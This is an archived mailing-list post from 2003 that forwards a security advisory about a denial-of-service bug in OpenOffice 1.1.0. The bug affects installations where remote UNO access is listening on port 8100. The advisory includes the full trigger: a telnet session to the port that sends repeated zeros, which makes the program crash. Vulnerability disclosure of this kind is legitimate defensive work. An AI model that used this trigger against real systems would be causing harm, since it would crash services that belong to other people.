More vulnerable Open Source Software.
attached mail follows:
================================
Illegalaccess.org Security Alert
================================
Date : 08/10/2003
Application : Openoffice
Version : 1.1.0
Website : http://www.Openoffice.org
Problems : Desktop Denial-Of-Service
Severity : Low
Contributor : Marc Schoenefeld, marc@org.illegalaccess
When enabling remote access (UNO) to OpenOffice,
it opens a port (default 8100). This is done typically with
the following command:
C:\Programme\oo1.1.0\program> soffice
"-accept=socket,host=<ip>,port=8100;urp;"
where <ip> states the listening address
When issuing the commands listed below, Openoffice crashes and
prompts the error reporting box.
===================================================================
C:\Dokumente und Einstellungen\User>telnet 127.0.0.1 8100
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
0
0
0
0
0
0
0
0
0
0
0
0
===================================================================
-- Never be afraid to try something new. Remember, amateurs built the ark; professionals built the Titanic. -- Anonymous Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
--
Peace is only better than war if peace isn't hell, too.
-- Walker Percy, "The Second Coming"
___________________
Nolug mailing list
nolug@nolug.org
Received on 10/09/03
This archive was generated by hypermail 2.2.0 : 12/19/08 EST